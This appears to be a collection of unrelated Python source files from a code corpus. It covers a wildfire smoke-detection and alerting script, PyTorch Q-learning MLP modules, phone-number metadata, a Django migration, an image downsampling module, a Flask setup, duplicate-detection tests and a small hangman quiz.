sys.path.insert(0, os.path.join(fuegoRoot, 'lib'))
sys.path.insert(0, fuegoRoot)
import settings
settings.fuegoRoot = fuegoRoot
import collect_args
import rect_to_squares
import goog_helper
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # quiet down tensorflow logging (must be done before tf_helper)
import tf_helper
import db_manager
import email_helper
import sms_helper
import img_archive
from detection_policies import policies
import logging
import pathlib
import tempfile
import shutil
import time, datetime, dateutil.parser
import random
import re
import hashlib
from urllib.request import urlretrieve
import tensorflow as tf
from PIL import Image, ImageFile, ImageDraw, ImageFont
ImageFile.LOAD_TRUNCATED_IMAGES = True
def getNextImage(dbManager, cameras, cameraID=None):
"""Gets the next image to check for smoke
Uses a shared counter being updated by all cooperating detection processes
to index into the list of cameras to download the image to a local
temporary directory
Args:
dbManager (DbManager):
cameras (list): list of cameras
cameraID (str): optional specific camera to get image from
Returns:
Tuple containing camera name, current timestamp, and filepath of the image
"""
if getNextImage.tmpDir == None:
getNextImage.tmpDir = tempfile.TemporaryDirectory()
logging.warning('TempDir %s', getNextImage.tmpDir.name)
if cameraID:
camera = list(filter(lambda x: x['name'] == cameraID, cameras))[0]
else:
index = dbManager.getNextSourcesCounter() % len(cameras)
camera = cameras[index]
timestamp = int(time.time())
imgPath = img_archive.getImgPath(getNextImage.tmpDir.name, camera['name'], timestamp)
# logging.warning('urlr %s %s', camera['url'], imgPath)
try:
urlretrieve(camera['url'], imgPath)
except Exception as e:
logging.error('Error fetching image from %s %s', camera['name'], str(e))
return getNextImage(dbManager, cameras)
md5 = hashlib.md5(open(imgPath, 'rb').read()).hexdigest()
if ('md5' in camera) and (camera['md5'] == md5) and not cameraID:
logging.warning('Camera %s image unchanged', camera['name'])
# skip to next camera
return getNextImage(dbManager, cameras)
camera['md5'] = md5
return (camera['name'], timestamp, imgPath, md5)
getNextImage.tmpDir = None
# XXXXX Use a fixed stable directory for testing
# from collections import namedtuple
# Tdir = namedtuple('Tdir', ['name'])
# getNextImage.tmpDir = Tdir('c:/tmp/dftest')
def getNextImageFromDir(imgDirectory):
"""Gets the next image to check for smoke from given directory
A variant of getNextImage() above but works with files already present
on the locla filesystem.
Args:
imgDirectory (str): directory containing the files
Returns:
Tuple containing camera name, current timestamp, and filepath of the image
"""
if getNextImageFromDir.tmpDir == None:
getNextImageFromDir.tmpDir = tempfile.TemporaryDirectory()
logging.warning('TempDir %s', getNextImageFromDir.tmpDir.name)
if not getNextImageFromDir.files:
allFiles = os.listdir(imgDirectory)
# filter out files with _Score suffix because they contain annotated scores
# generated by drawFireBox() function below.
getNextImageFromDir.files = list(filter(lambda x: '_Score.jpg' not in x, allFiles))
getNextImageFromDir.index += 1
if getNextImageFromDir.index < len(getNextImageFromDir.files):
fileName = getNextImageFromDir.files[getNextImageFromDir.index]
origPath = os.path.join(imgDirectory, fileName)
destPath = os.path.join(getNextImageFromDir.tmpDir.name, fileName)
shutil.copyfile(origPath, destPath)
parsed = img_archive.parseFilename(fileName)
if not parsed:
# failed to parse, so skip to next image
return getNextImageFromDir(imgDirectory)
md5 = hashlib.md5(open(destPath, 'rb').read()).hexdigest()
return (parsed['cameraID'], parsed['unixTime'], destPath, md5)
logging.warning('Finished processing all images in directory. Exiting')
exit(0)
getNextImageFromDir.files = None
getNextImageFromDir.index = -1
getNextImageFromDir.tmpDir = None
def checkAndUpdateAlerts(dbManager, camera, timestamp, driveFileIDs):
"""Check if alert has been recently sent out for given camera
Args:
dbManager (DbManager):
camera (str): camera name
timestamp (int):
driveFileIDs (list): List of Google drive IDs for the uploaded image files
Returns:
True if this is a new alert, False otherwise
"""
# Only alert if there has not been a detection in the last hour. This prevents spam
# from long lasting fires.
sqlTemplate = """SELECT * FROM detections
where CameraName='%s' and timestamp > %s and timestamp < %s"""
sqlStr = sqlTemplate % (camera, timestamp - 60*60, timestamp)
dbResult = dbManager.query(sqlStr)
if len(dbResult) > 0:
logging.warning('Supressing new alert due to recent detection')
return False
dbRow = {
'CameraName': camera,
'Timestamp': timestamp,
'ImageID': driveFileIDs[0] if driveFileIDs else ''
}
dbManager.add_data('alerts', dbRow)
return True
def alertFire(constants, cameraID, imgPath, annotatedFile, driveFileIDs, fireSegment, timestamp):
"""Send alerts about given fire through all channels (currently email and sms)
Args:
constants (dict): "global" contants
cameraID (str): camera name
imgPath: filepath of the original image
annotatedFile: filepath of the annotated image
driveFileIDs (list): List of Google drive IDs for the uploaded image files
fireSegment (dictionary): dictionary with information for the segment with fire/smoke
timestamp (int): time.time() value when image was taken
"""
emailFireNotification(constants, cameraID, imgPath, annotatedFile, driveFileIDs, fireSegment, timestamp)
smsFireNotification(constants['dbManager'], cameraID)
def emailFireNotification(constants, cameraID, imgPath, annotatedFile, driveFileIDs, fireSegment, timestamp):
"""Send an email alert for a potential new fire
Send email with information about the camera and fire score includeing
image attachments
Args:
constants (dict): "global" contants
cameraID (str): camera name
imgPath: filepath of the original image
annotatedFile: filepath of the annotated image
driveFileIDs (list): List of Google drive IDs for the uploaded image files
fireSegment (dictionary): dictionary with information for the segment with fire/smoke
timestamp (int): time.time() value when image was taken
"""
dbManager = constants['dbManager']
subject = 'Possible (%d%%) fire in camera %s' % (int(fireSegment['score']*100), cameraID)
body = 'Please check the attached images for fire.'
# commenting out links to google drive because they appear as extra attachments causing confusion
# and some email recipients don't even have permissions to access drive.
# for driveFileID in driveFileIDs:
# driveTempl = '\nAlso available from google drive as https://drive.google.com/file/d/%s'
# driveBody = driveTempl % driveFileID
# body += driveBody
# emails are sent from settings.fuegoEmail and bcc to everyone with active emails in notifications SQL table
dbResult = dbManager.getNotifications(filterActiveEmail = True)
emails = [x['email'] for x in dbResult]
if len(emails) > 0:
# attach images spanning a few minutes so reviewers can evaluate based on progression
startTimeDT = datetime.datetime.fromtimestamp(timestamp - 3*60)
endTimeDT = datetime.datetime.fromtimestamp(timestamp - 1*60)
with tempfile.TemporaryDirectory() as tmpDirName:
oldImages = img_archive.getHpwrenImages(constants['googleServices'], settings, tmpDirName,
constants['camArchives'], cameraID, startTimeDT, endTimeDT, 1)
attachments = oldImages or []
attachments.append(imgPath)
if annotatedFile:
attachments.append(annotatedFile)
email_helper.sendEmail(constants['googleServices']['mail'], settings.fuegoEmail, emails, subject, body, attachments)
def smsFireNotification(dbManager, cameraID):
"""Send an sms (phone text message) alert for a potential new fire
Args:
dbManager (DbManager):
cameraID (str): camera name
"""
message = 'Fuego fire notification in camera %s. Please check email for details' % cameraID
dbResult = dbManager.getNotifications(filterActivePhone = True)
phones = [x['phone'] for x in dbResult]
if len(phones) > 0:
for phone in phones:
sms_helper.sendSms(settings, phone, message)
def deleteImageFiles(imgPath, origImgPath, annotatedFile):
"""Delete all image files given in segments
Args:
imgPath: filepath of the original image
annotatedFile: filepath of the annotated image
"""
os.remove(imgPath)
if imgPath != origImgPath:
os.remove(origImgPath)
if annotatedFile:
os.remove(annotatedFile)
ppath = pathlib.PurePath(imgPath)
# leftoverFiles = os.listdir(str(ppath.parent))
# if len(leftoverFiles) > 0:
# logging.warning('leftover files %s', str(leftoverFiles))
def getLastScoreCamera(dbManager):
sqlStr = "SELECT CameraName from scores order by Timestamp desc limit 1;"
dbResult = dbManager.query(sqlStr)
if len(dbResult) > 0:
return dbResult[0]['CameraName']
return None
def heartBeat(filename):
"""Inform monitor process that this detection process is alive
Informs by updating the timestamp on given file
Args:
filename (str): file path of file used for heartbeating
"""
pathlib.Path(filename).touch()
def genDiffImage(imgPath, earlierImgPath, minusMinutes):
"""Subtract the two given images and store result in new difference image file
Args:
imgPath (str): filepath of the current image (to subtract from)
imgPath (str): filepath of the earlier image (value to subtract)
minusMinutes (int): number of minutes separating subtracted images
Returns:
file path to the difference image
"""
imgA = Image.open(imgPath)
imgB = Image.open(earlierImgPath)
imgDiff = img_archive.diffImages(imgA, imgB)
parsedName = img_archive.parseFilename(imgPath)
parsedName['diffMinutes'] = minusMinutes
imgDiffName = img_archive.repackFileName(parsedName)
ppath = pathlib.PurePath(imgPath)
imgDiffPath = os.path.join(str(ppath.parent), imgDiffName)
imgDiff.save(imgDiffPath, format='JPEG')
return imgDiffPath
def updateTimeTracker(timeTracker, processingTime):
"""Update the time tracker data with given time to process current image
If enough samples new samples have been reorded, resets the history and
updates the average timePerSample
Args:
timeTracker (dict): tracks recent image processing times
processingTime (float): number of seconds needed to process current image
"""
timeTracker['totalTime'] += processingTime
timeTracker['numSamples'] += 1
# after N samples, update the rate to adapt to current conditions
# N = 50 should be big enough to be stable yet small enough to adapt
if timeTracker['numSamples'] > 50:
timeTracker['timePerSample'] = timeTracker['totalTime'] / timeTracker['numSamples']
timeTracker['totalTime'] = 0
timeTracker['numSamples'] = 0
logging.warning('New timePerSample %.2f', timeTracker['timePerSample'])
def initializeTimeTracker():
"""Initialize the time tracker
Returns:
timeTracker (dict):
"""
return {
'totalTime': 0.0,
'numSamples': 0,
'timePerSample': 3 # start off with estimate of 3 seconds per camera
}
def getArchivedImages(constants, cameras, startTimeDT, timeRangeSeconds, minusMinutes):
"""Get random images from HPWREN archive matching given constraints and optionally subtract them
Args:
constants (dict): "global" contants
cameras (list): list of cameras
startTimeDT (datetime): starting time of time range
timeRangeSeconds (int): number of seconds in time range
minusMinutes (int): number of desired minutes between images to subract
Returns:
Tuple containing camera name, current timestamp, filepath of regular image, and filepath of difference image
"""
if getArchivedImages.tmpDir == None:
getArchivedImages.tmpDir = tempfile.TemporaryDirectory()
logging.warning('TempDir %s', getArchivedImages.tmpDir.name)
cameraID = cameras[int(len(cameras)*random.random())]['name']
timeDT = startTimeDT + datetime.timedelta(seconds = random.random()*timeRangeSeconds)
if minusMinutes:
prevTimeDT = timeDT + datetime.timedelta(seconds = -60 * minusMinutes)
else:
prevTimeDT = timeDT
files = img_archive.getHpwrenImages(constants['googleServices'], settings, getArchivedImages.tmpDir.name,
constants['camArchives'], cameraID, prevTimeDT, timeDT, minusMinutes or 1)
# logging.warning('files %s', str(files))
if not files:
return (None, None, None, None)
if minusMinutes:
if len(files) > 1:
if files[0] >= files[1]: # files[0] is supposed to be earlier than files[1]
logging.warning('unexpected file order %s', str(files))
for file in files:
os.remove(file)
return (None, None, None, None)
imgDiffPath = genDiffImage(files[1], files[0], minusMinutes)
os.remove(files[0]) # no longer needed
parsedName = img_archive.parseFilename(files[1])
return (cameraID, parsedName['unixTime'], files[1], imgDiffPath)
else:
logging.warning('unexpected file count %s', str(files))
for file in files:
os.remove(file)
return (None, None, None, None)
elif len(files) > 0:
parsedName = img_archive.parseFilename(files[0])
return (cameraID, parsedName['unixTime'], files[0], files[0])
return (None, None, None, None)
getArchivedImages.tmpDir = None
def main():
optArgs = [
["b", "heartbeat", "filename used for heartbeating check"],
["c", "collectPositves", "collect positive segments for training data"],
["d", "imgDirectory", "Name of the directory containing the images"],
["t", "time", "Time breakdown for processing images"],
["m", "minusMinutes", "(optional) subtract images from given number of minutes ago"],
["r", "restrictType", "Only process images from cameras of given type"],
["s", "startTime", "(optional) performs search with modifiedTime > startTime"],
["e", "endTime", "(optional) performs search with modifiedTime < endTime"],
]
args = collect_args.collectArgs([], optionalArgs=optArgs, parentParsers=[goog_helper.getParentParser()])
minusMinutes = int(args.minusMinutes) if args.minusMinutes else 0
googleServices = goog_helper.getGoogleServices(settings, args)
dbManager = db_manager.DbManager(sqliteFile=settings.db_file,
psqlHost=settings.psqlHost, psqlDb=settings.psqlDb,
psqlUser=settings.psqlUser, psqlPasswd=settings.psqlPasswd)
tfConfig = tf.ConfigProto()
tfConfig.gpu_options.per_process_gpu_memory_fraction = 0.1 #hopefully reduces segfaults
cameras = dbManager.get_sources(activeOnly=True, restrictType=args.restrictType)
startTimeDT = dateutil.parser.parse(args.startTime) if args.startTime else None
endTimeDT = dateutil.parser.parse(args.endTime) if args.endTime else None
timeRangeSeconds = None
useArchivedImages = False
camArchives = img_archive.getHpwrenCameraArchives(googleServices['sheet'], settings)
DetectionPolicyClass = policies.get_policies()[settings.detectionPolicy]
detectionPolicy = DetectionPolicyClass(settings, args, googleServices, dbManager, tfConfig, camArchives, minusMinutes, useArchivedImages)
constants = { # dictionary of constants to reduce parameters in various functions
'args': args,
'googleServices': googleServices,
'camArchives': camArchives,
'dbManager': dbManager,
}
if startTimeDT or endTimeDT:
assert startTimeDT and endTimeDT
timeRangeSeconds = (endTimeDT-startTimeDT).total_seconds()
assert timeRangeSeconds > 0
assert args.collectPositves
useArchivedImages = True
random.seed(0) # fixed seed guarantees same randomized ordering. Should make this optional argument in future
processingTimeTracker = initializeTimeTracker()
while True:
classifyImgPath = None
timeStart = time.time()
if useArchivedImages:
(cameraID, timestamp, imgPath, classifyImgPath) = \
getArchivedImages(constants, cameras, startTimeDT, timeRangeSeconds, minusMinutes)
# elif minusMinutes: to be resurrected using archive functionality
# elif args.imgDirectory: unused functionality -- to delete?
# (cameraID, timestamp, imgPath, md5) = getNextImageFromDir(args.imgDirectory)
else: # regular (non diff mode), grab image and process
(cameraID, timestamp, imgPath, md5) = getNextImage(dbManager, cameras)
classifyImgPath = imgPath
if not cameraID:
continue # skip to next camera
timeFetch = time.time()
image_spec = [{}]
image_spec[-1]['path'] = classifyImgPath
image_spec[-1]['timestamp'] = timestamp
image_spec[-1]['cameraID'] = cameraID
detectionResult = detectionPolicy.detect(image_spec)
timeDetect = time.time()
if detectionResult['fireSegment']:
if checkAndUpdateAlerts(dbManager, cameraID, timestamp, detectionResult['driveFileIDs']):
alertFire(constants, cameraID, imgPath, detectionResult['annotatedFile'], detectionResult['driveFileIDs'], detectionResult['fireSegment'], timestamp)
deleteImageFiles(imgPath, imgPath, detectionResult['annotatedFile'])
if (args.heartbeat):
heartBeat(args.heartbeat)
timePost = time.time()
updateTimeTracker(processingTimeTracker, timePost - timeStart)
if args.time:
if not detectionResult['timeMid']:
detectionResult['timeMid'] = timeDetect
logging.warning('Timings: fetch=%.2f, detect0=%.2f, detect1=%.2f post=%.2f',
timeFetch-timeStart, detectionResult['timeMid']-timeFetch, timeDetect-detectionResult['timeMid'], timePost-timeDetect)
if __name__=="__main__":
main()
| 1.820313 | 2 |
torch_agents/cogment_verse_torch_agents/third_party/hive/mlp.py | kharyal/cogment-verse | 0 | 11044 | import math
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn
class SimpleMLP(nn.Module):
"""Simple MLP function approximator for Q-Learning."""
def __init__(self, in_dim, out_dim, hidden_units=256, num_hidden_layers=1):
super().__init__()
self.input_layer = nn.Sequential(nn.Linear(in_dim, hidden_units), nn.ReLU())
self.hidden_layers = nn.Sequential(
*[nn.Sequential(nn.Linear(hidden_units, hidden_units), nn.ReLU()) for _ in range(num_hidden_layers - 1)]
)
self.output_layer = nn.Linear(hidden_units, out_dim)
def forward(self, x):
x = self.input_layer(x)
x = self.hidden_layers(x)
return self.output_layer(x)
class NoisyLinear(nn.Module):
"""NoisyLinear Layer"""
def __init__(self, in_dim, out_dim, std_init=0.4):
super(NoisyLinear, self).__init__()
self.in_features = in_dim
self.out_features = out_dim
self.std_init = std_init
self.weight_mu = nn.Parameter(torch.empty(out_dim, in_dim))
self.weight_sigma = nn.Parameter(torch.empty(out_dim, in_dim))
self.register_buffer("weight_epsilon", torch.empty(out_dim, in_dim))
self.bias_mu = nn.Parameter(torch.empty(out_dim))
self.bias_sigma = nn.Parameter(torch.empty(out_dim))
self.register_buffer("bias_epsilon", torch.empty(out_dim))
self.reset_parameters()
self.sample_noise()
def reset_parameters(self):
mu_range = 1.0 / math.sqrt(self.in_features)
self.weight_mu.data.uniform_(-mu_range, mu_range)
self.weight_sigma.data.fill_(self.std_init / math.sqrt(self.in_features))
self.bias_mu.data.uniform_(-mu_range, mu_range)
self.bias_sigma.data.fill_(self.std_init / math.sqrt(self.out_features))
def _scale_noise(self, size):
x = torch.randn(size)
return x.sign().mul_(x.abs().sqrt_())
def sample_noise(self):
epsilon_in = self._scale_noise(self.in_features)
epsilon_out = self._scale_noise(self.out_features)
weight_eps = epsilon_out.ger(epsilon_in)
bias_eps = epsilon_out
return weight_eps, bias_eps
def forward(self, inp):
if self.training:
weight_eps, bias_eps = self.sample_noise()
return F.linear(
inp,
self.weight_mu + self.weight_sigma * weight_eps,
self.bias_mu + self.bias_sigma * bias_eps,
)
else:
return F.linear(inp, self.weight_mu, self.bias_mu)
class ComplexMLP(nn.Module):
"""MLP function approximator for Q-Learning."""
def __init__(
self,
in_dim,
out_dim,
hidden_units=256,
num_hidden_layers=1,
noisy=False,
dueling=False,
sigma_init=0.5,
atoms=1,
):
super().__init__()
self._noisy = noisy
self._dueling = dueling
self._sigma_init = sigma_init
self._in_dim = np.prod(in_dim)
self._hidden_units = hidden_units
if self._dueling:
num_hidden_layers = max(num_hidden_layers - 1, 2)
self._num_hidden_layers = num_hidden_layers
self._out_dim = out_dim
self._atoms = atoms
self.init_networks()
def init_networks(self):
if self._noisy:
self.input_layer = nn.Sequential(
NoisyLinear(self._in_dim, self._hidden_units, self._sigma_init),
nn.ReLU(),
)
self.hidden_layers = nn.Sequential(
*[
nn.Sequential(
NoisyLinear(self._hidden_units, self._hidden_units, self._sigma_init),
nn.ReLU(),
)
for _ in range(self._num_hidden_layers - 1)
]
)
else:
self.input_layer = nn.Sequential(nn.Linear(self._in_dim, self._hidden_units), nn.ReLU())
self.hidden_layers = nn.Sequential(
*[
nn.Sequential(nn.Linear(self._hidden_units, self._hidden_units), nn.ReLU())
for _ in range(self._num_hidden_layers - 1)
]
)
if self._dueling:
"""In dueling, we have two heads - one for estimating advantage function and one for
estimating value function. If `noisy` is also true, then each of these layers will
be NoisyLinear()"""
if self._noisy:
self.output_layer_adv = nn.Sequential(
NoisyLinear(self._hidden_units, self._hidden_units, self._sigma_init),
nn.ReLU(),
NoisyLinear(
self._hidden_units,
self._out_dim * self._atoms,
self._sigma_init,
),
)
self.output_layer_val = nn.Sequential(
NoisyLinear(self._hidden_units, self._hidden_units, self._sigma_init),
nn.ReLU(),
NoisyLinear(
self._hidden_units,
1 * self._atoms,
self._sigma_init,
),
)
else:
self.output_layer_adv = nn.Sequential(
nn.Linear(self._hidden_units, self._hidden_units, self._sigma_init),
nn.ReLU(),
nn.Linear(
self._hidden_units,
self._out_dim * self._atoms,
self._sigma_init,
),
)
self.output_layer_val = nn.Sequential(
nn.Linear(self._hidden_units, self._hidden_units, self._sigma_init),
nn.ReLU(),
nn.Linear(
self._hidden_units,
1 * self._atoms,
self._sigma_init,
),
)
else:
if self._noisy:
self.output_layer = NoisyLinear(self._hidden_units, self._out_dim * self._atoms, self._sigma_init)
else:
self.output_layer = nn.Linear(self._hidden_units, self._out_dim * self._atoms)
def forward(self, x):
x = torch.flatten(x, start_dim=1)
x = self.input_layer(x)
x = self.hidden_layers(x)
if self._dueling:
adv = self.output_layer_adv(x)
val = self.output_layer_val(x)
if len(adv.shape) == 1:
x = val + adv - adv.mean(0)
else:
x = val + adv - adv.mean(1).unsqueeze(1).expand(x.shape[0], self._out_dim)
else:
x = self.output_layer(x)
return x
class DistributionalMLP(ComplexMLP):
"""Distributional MLP function approximator for Q-Learning."""
def __init__(
self,
in_dim,
out_dim,
supports,
hidden_units=256,
num_hidden_layers=1,
noisy=True,
dueling=True,
sigma_init=0.5,
atoms=51,
):
super().__init__(
in_dim,
out_dim,
hidden_units,
num_hidden_layers,
noisy,
dueling,
sigma_init,
atoms,
)
self._supports = supports
def forward(self, x):
x = torch.flatten(x, start_dim=1)
x = self.dist(x)
x = torch.sum(x * self._supports, dim=2)
return x
def dist(self, x):
x = self.input_layer(x)
x = self.hidden_layers(x)
if self._dueling:
adv = self.output_layer_adv(x)
adv = adv.view(-1, self._out_dim, self._atoms)
val = self.output_layer_val(x)
val = val.view(-1, 1, self._atoms)
x = val + adv - adv.mean(dim=1, keepdim=True)
else:
x = self.output_layer(x)
x = x.view(-1, self._out_dim, self._atoms)
x = F.softmax(x, dim=-1)
x = x.clamp(min=1e-3)
return x
| 2.859375 | 3 |
phonenumbers/data/region_AC.py | ayushgoel/FixGoogleContacts | 2 | 11045 | """Auto-generated file, do not edit by hand. AC metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_AC = PhoneMetadata(id='AC', country_code=247, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='[2-467]\\d{3}', possible_number_pattern='\\d{4}'),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:[267]\\d|3[0-5]|4[4-69])\\d{2}', possible_number_pattern='\\d{4}', example_number='6889'),
mobile=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
toll_free=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
premium_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
shared_cost=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
personal_number=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
voip=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
pager=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
uan=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
emergency=PhoneNumberDesc(national_number_pattern='911', possible_number_pattern='\\d{3}', example_number='911'),
voicemail=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
short_code=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
standard_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
no_international_dialling=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'))
| 1.882813 | 2 |
awx/main/migrations/0156_capture_mesh_topology.py | ziegenberg/awx | 1 | 11046 | <reponame>ziegenberg/awx
# Generated by Django 2.2.20 on 2021-12-17 19:26
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('main', '0155_improved_health_check'),
]
operations = [
migrations.AlterField(
model_name='instance',
name='node_type',
field=models.CharField(
choices=[
('control', 'Control plane node'),
('execution', 'Execution plane node'),
('hybrid', 'Controller and execution'),
('hop', 'Message-passing node, no execution capability'),
],
default='hybrid',
max_length=16,
),
),
migrations.CreateModel(
name='InstanceLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('source', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='main.Instance')),
('target', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reverse_peers', to='main.Instance')),
],
options={
'unique_together': {('source', 'target')},
},
),
migrations.AddField(
model_name='instance',
name='peers',
field=models.ManyToManyField(through='main.InstanceLink', to='main.Instance'),
),
]
| 1.75 | 2 |
models/dsd/bicubic.py | VinAIResearch/blur-kernel-space-exploring | 93 | 11047 | import torch
from torch import nn
from torch.nn import functional as F
class BicubicDownSample(nn.Module):
def bicubic_kernel(self, x, a=-0.50):
"""
This equation is exactly copied from the website below:
https://clouard.users.greyc.fr/Pantheon/experiments/rescaling/index-en.html#bicubic
"""
abs_x = torch.abs(x)
if abs_x <= 1.0:
return (a + 2.0) * torch.pow(abs_x, 3.0) - (a + 3.0) * torch.pow(abs_x, 2.0) + 1
elif 1.0 < abs_x < 2.0:
return a * torch.pow(abs_x, 3) - 5.0 * a * torch.pow(abs_x, 2.0) + 8.0 * a * abs_x - 4.0 * a
else:
return 0.0
def __init__(self, factor=4, cuda=True, padding="reflect"):
super().__init__()
self.factor = factor
size = factor * 4
k = torch.tensor(
[self.bicubic_kernel((i - torch.floor(torch.tensor(size / 2)) + 0.5) / factor) for i in range(size)],
dtype=torch.float32,
)
k = k / torch.sum(k)
# k = torch.einsum('i,j->ij', (k, k))
k1 = torch.reshape(k, shape=(1, 1, size, 1))
self.k1 = torch.cat([k1, k1, k1], dim=0)
k2 = torch.reshape(k, shape=(1, 1, 1, size))
self.k2 = torch.cat([k2, k2, k2], dim=0)
self.cuda = ".cuda" if cuda else ""
self.padding = padding
for param in self.parameters():
param.requires_grad = False
def forward(self, x, nhwc=False, clip_round=False, byte_output=False):
# x = torch.from_numpy(x).type('torch.FloatTensor')
filter_height = self.factor * 4
filter_width = self.factor * 4
stride = self.factor
pad_along_height = max(filter_height - stride, 0)
pad_along_width = max(filter_width - stride, 0)
filters1 = self.k1.type("torch{}.FloatTensor".format(self.cuda))
filters2 = self.k2.type("torch{}.FloatTensor".format(self.cuda))
# compute actual padding values for each side
pad_top = pad_along_height // 2
pad_bottom = pad_along_height - pad_top
pad_left = pad_along_width // 2
pad_right = pad_along_width - pad_left
# apply mirror padding
if nhwc:
x = torch.transpose(torch.transpose(x, 2, 3), 1, 2) # NHWC to NCHW
# downscaling performed by 1-d convolution
x = F.pad(x, (0, 0, pad_top, pad_bottom), self.padding)
x = F.conv2d(input=x, weight=filters1, stride=(stride, 1), groups=3)
if clip_round:
x = torch.clamp(torch.round(x), 0.0, 255.0)
x = F.pad(x, (pad_left, pad_right, 0, 0), self.padding)
x = F.conv2d(input=x, weight=filters2, stride=(1, stride), groups=3)
if clip_round:
x = torch.clamp(torch.round(x), 0.0, 255.0)
if nhwc:
x = torch.transpose(torch.transpose(x, 1, 3), 1, 2)
if byte_output:
return x.type("torch.{}.ByteTensor".format(self.cuda))
else:
return x
| 2.703125 | 3 |
control/webapp/__init__.py | doismellburning/control-panel | 1 | 11048 | <gh_stars>1-10
import logging
from flask import Flask
from . import utils, home, member, society, signup, jobs, admin
from .flask_seasurf import SeaSurf
from flask_talisman import Talisman
app = Flask(__name__,
template_folder="../templates",
static_folder="../static")
app.config['CSRF_CHECK_REFERER'] = False
csrf = SeaSurf(app)
Talisman(app)
logging.basicConfig(level=logging.DEBUG if app.debug else logging.INFO)
utils.setup_app(app)
app.register_blueprint(home.bp)
app.register_blueprint(member.bp)
app.register_blueprint(society.bp)
app.register_blueprint(signup.bp)
app.register_blueprint(jobs.bp)
app.register_blueprint(admin.bp)
| 1.851563 | 2 |
tests/rules/test_duplicates.py | imbillu/arche | 1 | 11049 | <gh_stars>1-10
import arche.rules.duplicates as duplicates
from arche.rules.result import Level, Outcome
from conftest import create_result
import numpy as np
import pandas as pd
import pytest
unique_inputs = [
({}, {}, {Level.INFO: [(Outcome.SKIPPED,)]}),
(
{"id": ["0", "0", "1"]},
{"unique": ["id"]},
{
Level.ERROR: [
("id contains 1 duplicated value(s)", None, {"same '0' `id`": [0, 1]})
]
},
),
(
{
"id": ["47" for x in range(6)],
"name": ["Walt", "Juan", "Juan", "Walt", "Walt", "John"],
},
{"unique": ["id", "name"]},
{
Level.ERROR: [
(
"id contains 1 duplicated value(s)",
None,
{"same '47' `id`": [i for i in range(6)]},
),
(
"name contains 2 duplicated value(s)",
None,
{"same 'Juan' `name`": [1, 2], "same 'Walt' `name`": [0, 3, 4]},
),
]
},
),
({"name": ["a", "b"]}, {"unique": ["name"]}, {}),
]
@pytest.mark.parametrize("data, tagged_fields, expected_messages", unique_inputs)
def test_find_by_unique(data, tagged_fields, expected_messages):
df = pd.DataFrame(data)
assert duplicates.find_by_unique(df, tagged_fields) == create_result(
"Duplicates By **unique** Tag", expected_messages, items_count=len(df)
)
@pytest.mark.parametrize(
"data, columns, expected_messages",
[
(
{"id": ["0", "0", "1"]},
["id"],
{
Level.ERROR: [
("2 duplicate(s) with same id", None, {"same '0' `id`": [0, 1]})
]
},
),
({"id": ["0", "1", "2"]}, ["id"], {}),
(
{"id": [np.nan, "9", "9"], "city": [np.nan, "Talca", "Talca"]},
["id", "city"],
{
Level.ERROR: [
(
"2 duplicate(s) with same id, city",
None,
{"same '9' `id`, 'Talca' `city`": [1, 2]},
)
]
},
),
],
)
def test_find_by(data, columns, expected_messages):
df = pd.DataFrame(data)
assert duplicates.find_by(df, columns) == create_result(
"Duplicates", expected_messages, items_count=len(df)
)
@pytest.mark.parametrize(
"data, tagged_fields, expected_messages",
[
({}, {}, {Level.INFO: [(Outcome.SKIPPED,)]}),
(
{"name": ["bob", "bob", "bob", "bob"], "url": ["u1", "u1", "2", "u1"]},
{"name_field": ["name"], "product_url_field": ["url"]},
{
Level.ERROR: [
(
"3 duplicate(s) with same name, url",
None,
{"same 'bob' `name`, 'u1' `url`": [0, 1, 3]},
)
]
},
),
(
{"name": ["john", "bob"], "url": ["url1", "url1"]},
{"name_field": ["name"], "product_url_field": ["url"]},
{},
),
],
)
def test_find_by_name_url(data, tagged_fields, expected_messages):
df = pd.DataFrame(data)
result = duplicates.find_by_name_url(df, tagged_fields)
assert result == create_result(
"Duplicates By **name_field, product_url_field** Tags",
expected_messages,
items_count=len(df),
)
| 2.453125 | 2 |
Question_1.py | Queen-Jonnie/Work | 0 | 11050 | # This is the word list from where the answers for the hangman game will come from.
word_list = [
2015,
"<NAME>",
"Rwanda and Mauritius",
2,
"Dr, <NAME>",
"<NAME>",
"Madagascar",
94,
8,
"Mauritius"
]
# Here we are defining the variables 'Right'(for when they get the question correct) and \n
# 'tries'(for when they get a question wrong).
Right = 0
tries = 0
# This function below after called, will greet the user when they input their name.
def greet(name):
print("Hello " + name + " welcome to hangman and good luck!")
user_name = input("What is your name?")
greet(user_name)
# This functions below when called, will check when guess is returned whether the user's guess is in the word_list\n
# or not and will print out the appropriate responses while consecutively adding to the 'Right' or 'tries' variable.
def alu(guess):
if guess in word_list:
print("congrats!")
def check(guess):
if guess not in word_list:
print("Wrong")
return guess
guess1 = int(input("When was ALU founded?"))
if alu(guess1):
Right += 1
else:
check(guess1)
tries += 1
guess2 = input("Who is the CEO of ALU")
if alu(guess2):
Right += 1
else:
check(guess2)
tries += 1
guess3 = input("Where are ALU campuses?")
if alu(guess3):
Right += 1
else:
check(guess3)
tries += 1
guess4 = int(input("How many campuses does ALU have?"))
if alu(guess4):
Right += 1
else:
check(guess4)
tries += 1
